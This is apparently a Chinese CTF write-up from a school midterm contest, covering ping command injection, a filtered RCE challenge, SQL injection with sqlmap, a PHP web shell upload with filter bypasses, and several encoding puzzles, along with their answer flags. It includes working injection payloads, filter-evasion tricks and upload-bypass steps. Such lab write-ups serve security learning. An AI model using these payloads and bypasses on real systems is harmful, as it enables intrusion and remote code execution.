2022春季学期期中考核

Web ping

进入环境

 我们尝试输入127.0.0.1 ping下试试 发现没有回显

再试试127.0.0.1;ls 也没有回显，然后我就以为是ping命令执行无回显类的题目我就去百度搜，发现应该不是，突然想到管道符|,试试就出来了

127.0.0.1|ls

这里的flag.txt是假的

 127.0.0.1|ls /

 看见真正的flag了

127.0.0.1|cat /REAL_flLLLAAAag

在源代码里得到flag,抓包也可以看得见

Crypto&Misc emo

有个emoji.txt

打开是一串emoji表情，这题我是百度搜索emoji表情密码找到的解密网站

赛后还知道这个可以用base100解

解出来得到 l{ji1j8-ll2rkj-i46089}g270-03606m0l44-926g

第一眼看着像栅栏我们去试试

lrgm{k20jj7li-041i-4j40-8639-062l806l96g2} 第四组的时候解到这个像凯撒密码

对照ascii码表我们可以知道位移量是6 得到flag

flag{e20dd7fc-041c-4d40-8639-062f806f96a2}

ping2

    



来点RCE

先进入环境.

 这题加上了过滤

/(\||&|;| |\/|'|\"|%|{|}|php|cat|flag|YunXi)/
| & ; 空格 / ' " % { } php cat flag YunXi

我们先ping一下试试,一样没有回显，因为过滤了分隔符所以我们在url上用

%0a绕过分隔符 %09绕过空格 反斜杠\绕过/ tac绕过cat *或者?,+绕过flag和YunXi

最后payload

?ip=127.0.0.1%0Als

Array
(
    [0] => YunXi
    [1] => flag
    [2] => index.php
)


?ip=127.0.0.1%0Atac%09\fla*

Array
(
    [0] => flag{it_isnt_REAL_FLAG}
)


?ip=127.0.0.1%0Als%09\YunX*

Array
(
    [0] => flag_1S_HeRe.php
)

?ip=127.0.0.1%0Acd%09YunX*%0Atac%09f*

EZ_sql

进入环境是一个登陆页面

这题可以直接想到我之前打sqlilabs less-15 利用sqlmap进行POST注入

过程可以说是一样的了

 先抓包保存登录信息得到参数和网址来给sqlmap爆破

点击Action 选择copy to file

python sqlmap.py -r "C:\Users\宋嘉明\Desktop3.txt" -p u -D challenges -T  fl44444g -C flag --dump

upload

进入环境

我们可以用dirsearch扫出文件上传的目录

python dirsearch.py -u http://192.168.xxxxxxx

 然后我们开始上传一个普通的一句话木马shell.php测试

 抓包修改成 image/png

 

经过测试php,php3,php5等等都被检测了，我们可以用phtml绕过

同样抓包修改后缀名

 

 上面的忘记改了一般的一句话是用post

然后这里检测到文件内容里有POST

我们用GET绕过就行了

 

 最后还有一个白名单限制只能上传jpg和png，那么应该是检测文件头，这里参考博客

 这是我做的马

 绕后上传抓包修改

 

 

 这里因为我比赛的时候没想到php代码是不会显示在页面里的，需要用文件高亮函数才会显示，所以我以为我的马被防火墙给过滤了，并且这里是GET方式连接

 

 就是这样

RSA

得到一个rsq.py

 flag就在里面

签到 签到

Wm14aFp5VTNRa2cwZG1WZk5GOUhNREJrWDFReGJXVWxOMFElM0Q=

只有一个字符串，看起来像base64

ZmxhZyU3Qkg0dmVfNF9HMDBkX1QxbWUlN0Q%3D  第一次解出来
flag%7BH4ve_4_G00d_T1me%7D7 第二次解出来

用URL解码

flag{H4ve_4_G00d_T1me}7

去掉最后的7就是flag了

Pwn Reverse Forensics